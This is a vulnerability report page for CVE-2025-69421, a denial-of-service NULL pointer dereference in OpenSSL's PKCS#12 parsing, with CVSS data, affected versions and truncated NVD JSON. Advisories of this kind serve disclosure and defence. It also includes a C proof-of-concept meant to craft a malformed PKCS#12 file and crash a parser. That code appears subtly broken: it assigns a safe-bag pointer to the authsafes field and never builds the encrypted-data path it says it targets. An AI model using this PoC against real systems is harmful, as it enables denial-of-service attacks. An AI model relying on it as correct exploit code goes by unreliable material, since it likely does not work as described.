Security Vulnerability Report
CVE-2025-69421 CVSS 7.5 HIGH

CVE-2025-69421

Published: 2026-01-27 16:16:34
Last Modified: 2026-05-12 13:17:27

Description

Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer dereference in the PKCS12_item_decrypt_d2i_ex() function.

Impact summary: A NULL pointer dereference can trigger a crash which leads to Denial of Service for an application processing PKCS#12 files.

The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct parameter is NULL before dereferencing it. When called from PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can be NULL, causing a crash. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure.

Exploiting this issue requires an attacker to provide a malformed PKCS#12 file to an application that processes it. For that reason the issue was assessed as Low severity according to our Security Policy.

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:* - VULNERABLE
OpenSSL 3.6.x
OpenSSL 3.5.x
OpenSSL 3.4.x
OpenSSL 3.3.x
OpenSSL 3.0.x
OpenSSL 1.1.1.x
OpenSSL 1.0.2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-69421 PoC - Malformed PKCS#12 NULL Pointer Dereference
 * This PoC creates a malformed PKCS#12 file that triggers NULL pointer dereference
 * in PKCS12_item_decrypt_d2i_ex() function.
 *
 * Compile: gcc -o cve_2025_69421_poc cve_2025_69421_poc.c -lssl -lcrypto
 * Usage: ./cve_2025_69421_poc <output_p12_file>
 *
 * Note: the direct struct member access below (p12->version, p12->mac,
 * p12->authsafes) requires OpenSSL 1.0.2 headers; PKCS12 is an opaque
 * type from OpenSSL 1.1.0 onward.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/err.h>
#include <openssl/pem.h>
#include <openssl/pkcs12.h>

int create_malformed_pkcs12(const char *filename)
{
    /*
     * Create a minimal malformed PKCS#12 structure
     * The key is to craft a PKCS#12 with missing or malformed
     * encrypted data that will cause oct parameter to be NULL
     */
    PKCS12 *p12 = PKCS12_new();
    if (!p12)
        return -1;

    /* Set version to trigger parsing path */
    ASN1_INTEGER_set(p12->version, 3);

    /* Create empty or minimal safe bags */
    STACK_OF(PKCS12_SAFEBAG) *bags = sk_PKCS12_SAFEBAG_new_null();
    if (bags) {
        /* Add a malformed SAFEBAG that will cause issues */
        PKCS12_SAFEBAG *bag = PKCS12_SAFEBAG_new();
        if (bag) {
            /* Set a corrupted or missing encrypted content */
            /* This will lead to NULL oct parameter in PKCS12_item_decrypt_d2i_ex */
            PKCS12_MAC_DATA *mac = PKCS12_MAC_DATA_new();
            if (mac) {
                /* Leave mac data incomplete to trigger the vulnerable code path */
                p12->mac = mac;
            }
            sk_PKCS12_SAFEBAG_push(bags, bag);
        }
        p12->authsafes = sk_PKCS12_SAFEBAG_value(bags, 0);
    }

    /* Write the malformed PKCS#12 */
    FILE *fp = fopen(filename, "wb");
    if (fp) {
        i2d_PKCS12_fp(fp, p12);
        fclose(fp);
    }

    PKCS12_free(p12);
    return 0;
}

int trigger_vulnerability(const char *filename)
{
    /*
     * Attempt to parse the malformed PKCS#12 file
     * This will trigger the NULL pointer dereference
     */
    FILE *fp = fopen(filename, "rb");
    if (!fp) {
        printf("[-] Cannot open file: %s\n", filename);
        return -1;
    }

    PKCS12 *p12 = d2i_PKCS12_fp(fp, NULL);
    fclose(fp);

    if (p12) {
        EVP_PKEY *pkey = NULL;
        X509 *cert = NULL;
        STACK_OF(X509) *ca = NULL;

        /* This call triggers PKCS12_parse -> PKCS12_unpack_p7encdata */
        int ret = PKCS12_parse(p12, "", &pkey, &cert, &ca);
        printf("[*] PKCS12_parse returned: %d\n", ret);

        if (pkey)
            EVP_PKEY_free(pkey);
        if (cert)
            X509_free(cert);
        if (ca)
            sk_X509_pop_free(ca, X509_free);
        PKCS12_free(p12);
    } else {
        printf("[-] Failed to parse PKCS#12 (expected with malformed file)\n");
        ERR_print_errors_fp(stderr);
    }
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Usage: %s <output_p12_file>\n", argv[0]);
        return 1;
    }

    printf("[*] Creating malformed PKCS#12 file...\n");
    if (create_malformed_pkcs12(argv[1]) == 0) {
        printf("[+] Malformed PKCS#12 created: %s\n", argv[1]);
        printf("[*] Attempting to parse (this may trigger crash)...\n");
        trigger_vulnerability(argv[1]);
    }
    return 0;
}

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69421", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:34.437", "lastModified": "2026-05-12T13:17:26.710", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer\ndereference in the PKCS12_item_decrypt_d2i_ex() function.\n\nImpact summary: A NULL pointer dereference can trigger a crash which leads to\nDenial of Service for an application processing PKCS#12 files.\n\nThe PKCS12_item_decrypt_d2i_ex() function does not check whether the oct\nparameter is NULL before dereferencing it. When called from\nPKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can\nbe NULL, causing a crash. The vulnerability is limited to Denial of Service\nand cannot be escalated to achieve code execution or memory disclosure.\n\nExploiting this issue requires an attacker to provide a malformed PKCS#12 file\nto an application that processes it. For that reason the issue was assessed as\nLow severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue."}, {"lang": "es", "value": "Resumen del problema: Procesar un archivo PKCS#12 malformado puede desencadenar una desreferencia de puntero NULL en la función PKCS12_item_decrypt_d2i_ex().\n\nResumen del impacto: Una desreferencia de puntero NULL puede desencadenar un fallo que lleva a la denegación de servicio para una aplicación que procesa archivos PKCS#12.\n\nLa función PKCS12_item_decrypt_d2i_ex() no comprueba si el parámetro oct es NULL antes de desreferenciarlo. Cuando se llama desde PKCS12_unpack_p7encdata() con un archivo PKCS#12 malformado, este parámetro puede ser NULL, causando un fallo. 
La vulnerabilidad está limitada a la denegación de servicio y no puede ser escalada para lograr la ejecución de código o la divulgación de memoria.\n\nExplotar este problema requiere que un atacante proporcione un archivo PKCS#12 malformado a una aplicación que lo procesa. Por esa razón, el problema fue evaluado como de baja severidad según nuestra Política de Seguridad.\n\nLos módulos FIPS en 3.6, 3.5, 3.4, 3.3 y 3.0 no se ven afectados por este problema, ya que la implementación de PKCS#12 está fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 y 1.0.2 son vulnerables a este problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.2", "versionEndExcluding": "1.0.2zn", "matchCriteriaId": 
"6A8EC60C-05EC-4886-8C82-63AEF4BDA8D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.1", "versionEndIncluding": "1.1.1ze", "matchCriteriaId": "A940A7B2-E35C-420E-A0EE-F1089180C133"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.19", "matchCriteriaId": "C76C5F55-5243-4461-82F5-2FEBFF4D59FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "F5292E9E-6B50-409F-9219-7B0A04047AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.4", "matchCriteriaId": "B9D3DCAE-317D-4DFB-93F0-7A235A229619"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0CEEB2E09B62"}, {"v ... (truncated)